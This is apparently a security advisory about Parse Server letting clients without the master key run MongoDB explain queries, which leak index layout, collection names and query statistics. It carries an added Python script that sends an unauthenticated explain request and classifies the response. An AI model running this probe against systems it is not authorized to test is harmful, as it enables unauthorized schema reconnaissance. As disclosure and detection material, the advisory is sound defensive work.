Parse Server allows public `explain` queries which may expose sensitive database performance information and schema details
Severity: Medium
Description
MongoDB's `explain()` returns the query planner's view of a query rather than its results: the winning plan and the rejected alternatives, which indexes were considered and used, whether the query fell back to a full collection scan (`COLLSCAN`), how many documents and index keys were examined, execution time, and the namespace (database and collection name) the query ran against. Parse Server accepts `explain` as a query option on class queries and, in affected versions, forwards it to MongoDB for any client that presents the application ID, without requiring the master key. An unauthenticated client can therefore learn index layout, collection names and query performance characteristics that are normally visible only to database administrators. Because the request is an ordinary class query with the `explain` option set, the quickest way to tell whether a deployment is affected is to send one without the master key and check whether the response carries a query plan instead of a result list.
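A probe for the behaviour described above, added here as an example and not part of the advisory or of Parse Server. It assumes the REST API is mounted at the usual `/parse` prefix, that the named class exists, and that `explain` is sent the same way other `Parse.Query` options such as `limit` are sent on a class `GET`; error code 119 is Parse's `OPERATION_FORBIDDEN`. Because the exact response shape of a vulnerable versus a patched server is not specified on this page, the classifier looks for MongoDB explain keys anywhere in the JSON body instead of assuming where they sit.

```python
"""Probe a Parse Server deployment for `explain` queries that run without the master key.

Added example (not Parse Server code). Assumptions: REST API mounted at BASE_URL
(e.g. http://host:1337/parse), CLASS_NAME exists, `explain` is passed like other
query options on a class GET, and Parse error code 119 means OPERATION_FORBIDDEN.
"""
import json
import sys
import urllib.error
import urllib.parse
import urllib.request

# Keys that only appear in MongoDB explain() output. The plan's `namespace`
# field (db.collection) is part of what leaks, but is too generic to key on.
EXPLAIN_MARKERS = ("queryPlanner", "executionStats", "winningPlan")
OPERATION_FORBIDDEN = 119  # Parse error code


def contains_explain_plan(obj):
    """True if a MongoDB explain() document appears anywhere in decoded JSON."""
    if isinstance(obj, dict):
        if any(key in obj for key in EXPLAIN_MARKERS):
            return True
        return any(contains_explain_plan(v) for v in obj.values())
    if isinstance(obj, list):
        return any(contains_explain_plan(v) for v in obj)
    return False


def classify(status, body_text):
    """Map an HTTP status and response body to one of four verdicts.

    'leaks-plan'    : a query plan came back, so explain ran without the master key
    'rejected'      : the server refused the request (expected on a patched server)
    'plain-results' : a normal result list; the option was ignored or unsupported
    'unknown'       : anything else (non-JSON body, unexpected shape)
    """
    try:
        body = json.loads(body_text)
    except ValueError:
        return "unknown"
    forbidden = isinstance(body, dict) and body.get("code") == OPERATION_FORBIDDEN
    if status in (401, 403) or forbidden:
        return "rejected"
    if contains_explain_plan(body):
        return "leaks-plan"
    if status == 200 and isinstance(body, dict) and isinstance(body.get("results"), list):
        return "plain-results"
    return "unknown"


def build_request(base_url, app_id, class_name):
    """GET /classes/<class> with explain=true and only the application ID header."""
    params = urllib.parse.urlencode({"where": "{}", "limit": "1", "explain": "true"})
    url = f"{base_url.rstrip('/')}/classes/{class_name}?{params}"
    return urllib.request.Request(url, headers={"X-Parse-Application-Id": app_id})


def probe(base_url, app_id, class_name, timeout=10):
    """Send the probe and classify whatever comes back, including HTTP error bodies."""
    req = build_request(base_url, app_id, class_name)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify(resp.status, resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as err:
        return classify(err.code, err.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    if len(sys.argv) != 4:
        sys.exit("usage: explain_probe.py BASE_URL APP_ID CLASS_NAME")
    print(probe(*sys.argv[1:]))
```

A verdict of `leaks-plan` means the server executed the explain for a caller holding nothing but the application ID, which is the condition this advisory describes; `rejected` is what a patched server should return. Run it against a staging instance first, since an explain with execution statistics makes MongoDB run the query in full.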
Recommendation
Update the parse-server package to the latest compatible version. Note that the patched version is a pre-release; if your deployment cannot track alpha releases, check whether a stable release containing the fix is available before pinning. Version details:
- Affected version(s): < 8.5.0-alpha.5
- Patched version(s): 8.5.0-alpha.5
Tags: npm, parse-server
Last updated on November 13, 2025